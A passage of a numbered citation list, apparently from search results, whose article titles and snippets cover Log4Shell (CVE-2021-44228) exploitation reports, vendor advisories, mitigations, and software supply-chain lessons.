  34. [34]
  35. [35]
    Log4j Scanning and CVE-2021-44228 Exploitation - Shadowserver
    Dec 16, 2021 · The top 10 malicious payloads and callback URIs being delivered by attackers attempting to exploit CVE-2021-44228 against our global honeypot sensor network in ...
  36. [36]
    Technical Advisory: Zero-day critical vulnerability in Log4j2 ...
    Dec 13, 2021 · Learn more about the Log4j2 vulnerability that is currently being exploited and how to protect yourself against it.<|separator|>
  37. [37]
    Mirai Malware that Allegedly Propagates Using Log4Shell Spotted ...
    Dec 20, 2021 · FortiGuard Labs is aware of a new Mirai Linux variant that spreads using CVE-2021-44228 (Log4Shell). This is possibly the first Mirai variant equipped with Log ...
  38. [38]
    China's APT41 exploited Log4j within hours - Computer Weekly
    Mar 9, 2022 · APT41 compromised multiple government organisations via the Log4Shell exploit within hours of its initial disclosure, Mandiant claims.Missing: probes | Show results with:probes<|control11|><|separator|>
  39. [39]
    The Numbers Behind Log4j Vulnerability CVE-2021-44228
    Dec 13, 2021 · Our reports of the last 48 hours prove that both criminal hacking groups and nation state actors are engaged in the exploration of this ...
  40. [40]
    Iranian hackers use Log4Shell to mine crypto on federal computer ...
    Nov 16, 2022 · Iranian hackers utilized a flaw in the ubiquitous open-source software library Log4j to breach a U.S. federal agency.
  41. [41]
    Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell ...
    Jan 13, 2022 · An Iranian state-sponsored actor has been observed scanning and attempting to abuse the Log4Shell flaw in publicly-exposed Java applications.
  42. [42]
    Microsoft: Nation-state Iranian hackers exploit Log4Shell against Israel
    Aug 28, 2022 · Earlier in December, Microsoft discovered that nation-state groups from China, Iran, North Korea, and Turkey were abusing Log4Shell to gain ...
  43. [43]
    Chinese, Iranian threat groups said to exploit Log4j | SC Media
    Dec 14, 2021 · CrowdStrike and Mandiant confirm that Chinese and Iranian nation-state actors have begun to exploit Log4j.
  44. [44]
    Log4Shell is being exploited by criminal gangs and intelligence ...
    Dec 18, 2021 · At the end of last week a vulnerability in Apache's Java Log4j library was disclosed. Now generally called "Log4Shell," it's formally ...
  45. [45]
    Log4j Chatter: What Threat Actors Are Sharing About the Log4Shell ...
    Dec 17, 2021 · Flashpoint analysts break down the most significant chatter amongst threat actor groups, including deep and dark web forums XSS, Raid, ...
  46. [46]
    How criminals are taking advantage of Log4shell vulnerability
    Jul 20, 2022 · Log4shell is a vulnerability found in Apache Log4j 2 library used for logging error messages in Java-based applications.
  47. [47]
    Log4Shell Vulnerability | Log4j Still Being Exploited - Contrast Security
    Dec 16, 2024 · Security researcher Chen Zhaojun of Chinese e-commerce company Alibaba first spotted the Log4Shell ... November 24, 2021. Apache promptly issued a ...
  48. [48]
    2024 State of the Software Supply Chain Report | 10 Year Look Back
    The challenges posed by vulnerabilities in widely used components, like Apache Struts, Heartbleed, and Log4Shell, have illuminated the fragility of our ...
  49. [49]
    Vulnerable instances of Log4j still being used nearly 3 years later
    Oct 14, 2024 · Critical vulnerabilities take over 500 days to be fixed.Missing: persistence | Show results with:persistence
  50. [50]
    Survey Surfaces Uneven Adoption of SBOMs to Secure Software
    Jun 4, 2025 · A survey of 100 security professionals finds nearly half (48%) of security professionals admit their organizations are falling behind on ...
  51. [51]
  52. [52]
    The gift that keeps on giving: A new opportunistic Log4j campaign
    Aug 20, 2024 · The new Log4j campaign uses obfuscated LDAP requests to execute malicious scripts, establish persistence, perform reconnaissance, exfiltrate ...Missing: SC Media
  53. [53]
    [ANNOUNCEMENT] Apache Log4j 2.15.0 Released-Apache Mail ...
    Dec 10, 2021 · The Apache Log4j 2 team is pleased to announce the Log4j 2.15.0 release! Apache Log4j is a well known framework for logging application ...
  54. [54]
    Log4j Exploit Security Vulnerability FAQs - Secureworks
    Dec 17, 2021 · On December 9, 2021, the Apache Software Foundation released Log4j 2.15.0 to resolve a critical remote code execution vulnerability (CVE-2021-44228, also known ...
  55. [55]
    RHSB-2021-009 Log4Shell - Remote Code Execution - log4j (CVE ...
    Dec 9, 2021 · For Log4j versions 2.10 and later: set the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to ...Missing: workarounds | Show results with:workarounds<|separator|>
  56. [56]
    Log4j2 Vulnerability "Log4Shell" (CVE-2021-44228) - CrowdStrike
    Dec 10, 2021 · CrowdStrike has identified a malicious Java class file hosted on infrastructure associated with a nation-state adversary.
  57. [57]
    Log4Shell - Understanding the Vulnerability and Mitigation Steps
    Configuration Workarounds – For vulnerable Log4j 2 versions, set the system property log4j2.formatMsgNoLookups=true to disable the JNDI lookup mechanism ...
  58. [58]
    [PDF] An Analysis of the Log4j and Spectre/Meltdown Vulnerabilities
    The performance overhead introduced by mitigation measures also impacted system efficiency, leading to trade-offs between security and performance.
  59. [59]
    Log4Shell: Critical Severity Apache Log4j Remote Code Execution ...
    formatMsgNoLookups=True is no longer effective nor is replacing logging ... Temporary Workarounds and Mitigations. The CFC has learned the previous ...
  60. [60]
    How To Scan & Fix The Log4j Vulnerability - PurpleSec
    If updating Log4j is not immediately feasible, temporary workarounds can be implemented, such as: Disabling JNDI lookups by setting the system property log4j2.
  61. [61]
    The Hidden Risk in Your Software: Managing Transitive ... - Kusari
    Updating the direct dependency breaks compatibility with other components? These scenarios create "dependency hell" situations that can paralyze development ...
  62. [62]
    The Risks of Transitive Dependencies in Supply Chain Security
    Dec 26, 2024 · A routine bug fix to a direct dependency can pull in a new transitive dependency version—one that introduces vulnerabilities or breaks your code ...Missing: pinning | Show results with:pinning
  63. [63]
    What is the Log4j/Log4Shell Vulnerability | CrowdStrike
    May 21, 2025 · The vulnerability stems from improper input validation in Log4j's Java Naming and Directory Interface (JNDI) lookup functionality. How the ...
  64. [64]
    Log4j: Why your organization needs to embrace software bills of ...
    Dec 15, 2021 · This widespread vulnerability is an object lesson for why software development organizations and their customers should be using SBOMs.
  65. [65]
    OWASP Dependency-Check
    OWASP Dependency-Check is a SCA tool that detects vulnerabilities in project dependencies by identifying CPE identifiers and generating reports.Introduction · Project Classification · Downloads
  66. [66]
    A Developer's Guide to Dependency Mapping - Jit.io
    Dec 23, 2024 · Dependency mapping is the key to understanding your software at its core. It highlights the hidden risks buried deep in your dependency chain.What Is Application... · How Developers Can Conduct... · 2. Use Version Pinning For...
  67. [67]
    Handling Vulnerable Transitive Dependencies in Gradle - raphael.li
    Apr 14, 2025 · So instead of letting example-library control what version of log4j it uses, we pin it ourselves. To see if it works, let's run gradle ...The Good Intentions · The (wrong) Fix: Adding A... · Use Dependency Constraints...
  68. [68]
    Protecting Your Development Environment: Lessons from Log4j and ...
    Jun 3, 2024 · Dependency management: Keep an inventory of all software dependencies and ensure they are up to date. Automated dependency management tools ...
  69. [69]
    Log4Shell Aftermath: CyRC Report on Company Responses
    Feb 2, 2023 · This indicates that customers are much more likely to update a component to mitigate a vulnerability rather than simply as a matter of routine.
  70. [70]
    Apache Log4j2 Security Bulletin (CVE-2021-44228) - AWS
    Apache Log4j2 Issue (CVE-2021-44228) · Initial Publication Date: 2021/12/10 7:20 PM PDT. All updates to this issue have moved here. · Amazon EC2.Missing: alert | Show results with:alert
  71. [71]
    Critical Apache Log4j Vulnerability Updates | FortiGuard Labs
    Dec 21, 2021 · It was initially identified as a Denial-of-Service (DoS) vulnerability with a CVSS score of 3.7 and moderate severity.
  72. [72]
    Beware the lasting legacy of Log4j - Security Solutions Media
    Dec 18, 2023 · Third-party dependencies: Many software projects rely on third-party libraries, and updating these libraries can introduce compatibility issues ...Missing: binary | Show results with:binary
  73. [73]
    Log4Shell Vulnerability Highlights Software Supply Chain Issues
    Jan 11, 2022 · Legacy systems are also a challenge, he said; if new versions of software don't support the older hardware, then a company can't update ...
  74. [74]
    FTC warns companies to remediate Log4j security vulnerability
    Jan 4, 2022 · A serious vulnerability in the popular Java logging package, Log4j (CVE-2021-44228) was disclosed, posing a severe risk to millions of consumer products.Missing: Log4Shell | Show results with:Log4Shell
  75. [75]
    Alert: Apache Log4j vulnerabilities - NCSC.GOV.UK
    A number of vulnerabilities have been disclosed that affect multiple versions of Apache Log4j. Scanning and attempted exploitation has been detected globally, ...Alert: Apache Log4j... · Recommended Priority Actions · Additional InformationMissing: protocols | Show results with:protocols
  76. [76]
    Joint cybersecurity advisory on mitigating Log4Shell and other Log4j ...
    Dec 22, 2021 · This joint CSA expands on advice and guidance the Cyber Centre has previously issued by detailing steps that vendors and organizations with IT ...
  77. [77]
    Cloudflare report: Log4j remains top target for attacks in 2023
    Dec 18, 2023 · Log4j remained a top attack vector for threat actors in 2023, while a new vulnerability, HTTP/2 Rapid Reset is emerging as a significant ...
  78. [78]
    Millions of Log4j vulnerable systems still unpatched - Lightstream.io
    May 30, 2023 · A recent survey by Qualys and published in SC Magazine suggests that after over 3 months, millions of Log4j vulnerable systems still unpatched, ...
  79. [79]
    The Log4J Vulnerability Will Haunt the Internet for Years - WIRED
    Dec 13, 2021 · A vulnerability in the open source Apache logging library Log4j sent system administrators and security professionals scrambling over the weekend.
  80. [80]
    Hyperscalers scramble to fix Apache Log4J 2 exploit
    Dec 13, 2021 · Hyperscalers and others issued patches and warnings over the weekend following news of a zero-day exploit in the popular Apache Log4J 2 library.
  81. [81]
    4 Lessons Learned from Log4Shell - SOCRadar
    Jan 16, 2023 · This system considers elements such as social media, news, code repositories, dark web, attribution with threat actors, and malware to score a ...4 Lessons Learned From... · Aquatic Panda Leverages... · Log4shell Exploitations In...<|control11|><|separator|>
  82. [82]
    Post Mortem on Log4J - Bright Security
    Sep 1, 2022 · Damages are estimated in the hundreds of millions, for the industry world-wide. Hundreds of thousands of hours of logged overtime, most ...Impact/damage/cost? · Lessons Learned?... · Action Items
  83. [83]
    Critical Remote Code Execution in Apache Log4j | Rapid7 Blog
    Dec 10, 2021 · CVE-2021-44228, a critical (CVSSv3 10) remote code execution (RCE) vulnerability affecting Apache Log4j 2.14.1 and earlier versions.
  84. [84]
    Digging into the numbers one year after Log4Shell | SC Media
    Dec 16, 2022 · “Hunting and patching Log4Shell is very costly. Over the past year, it has cost companies billions of dollars to get through the mitigations, ...
  85. [85]
    [PDF] SCRUTINIZING SUPPLY CHAINS: THE LOG4SHELL CRISIS AND ...
    3.7 Cost Estimation. Gartner and IDC estimate the total economic impact of Log4Shell to be over $2 billion. USD globally, accounting for: ○ Emergency ...
  86. [86]
    Mitigating security vulnerabilities moves front and center - Dynatrace
    Mar 1, 2023 · Discovered in 2021, Log4Shell affected millions of applications and devices. The average cost of remediation has been estimated at $90,000.
  87. [87]
    Software Bill of Materials (SBOM) - CISA
    Updated draft SBOM guidance outlines current best practices for software transparency and supply chain security. Open for public comment until October 3, 2025.
  88. [88]
    2024 State of the Software Supply Chain | Executive Summary
    This year's report, backed by data from over 7 million open source projects, double-clicks on many of the unsettling trends in security and risk management.
  89. [89]
    [PDF] State of the Software Supply Chain - Sonatype
    Although the number of published SBOMs is increasing, it is far outpaced by the growth rate of new components. This disparity suggests that while SBOM adoption ...
  90. [90]
  91. [91]
    Log4Shell Makes the Case for Runtime Application Self-Protection
    Dive into the case for RASP to combat Log4Shell and why Web app firewalls aren't great for these types of attacks.
  92. [92]
    Inside the Log4j2 vulnerability (CVE-2021-44228)
    Dec 10, 2021 · Vulnerability History. In 2013, in version 2.0-beta9, the Log4j package added the “JNDILookup plugin” in issue LOG4J2-313. To understand how ...
  93. [93]
    The internet runs on free open-source software. Who pays to fix it?
    Dec 17, 2021 · Volunteer-run projects like Log4J keep the internet running. The result is unsustainable burnout, and a national security risk when they go wrong.Missing: Apache | Show results with:Apache
  94. [94]
    Log4j Vulnerability (Log4Shell): Ongoing Challenges in Remediation
    Feb 16, 2022 · These challenges include but are not limited to: proper and comprehensive identification and timely remediation across all impacted systems.
  95. [95]
    Log4j Log4Shell Vulnerability Q&A - JFrog
    Dec 21, 2021 · The current exploit does not put version 1 at risk. However ... transitive dependencies, across your entire software supply chain.
  96. [96]
    [PDF] Log4Shell and Endemic Vulnerabilities in Open Source Libraries
    Oct 3, 2022 · The open source, commercial, and in-house software applications that use log4j require their own security updates to address the vulnerability.
  97. [97]
    Log4j and the problem with trusting open source | Cybersecurity Dive
    Dec 20, 2021 · With Log4j, widely used code contains exploitable vulnerabilities. Industry is making headway mitigating the risks of software supply chain ...
  98. [98]
    Key Learnings from Log4Shell: The Fragility of Open-Source ...
    Oct 1, 2022 · Because Log4Shell is an open-source Remote Code Execution (RCE) vulnerability, one of the highest-level security exposures a business can face, ...Missing: Fortune | Show results with:Fortune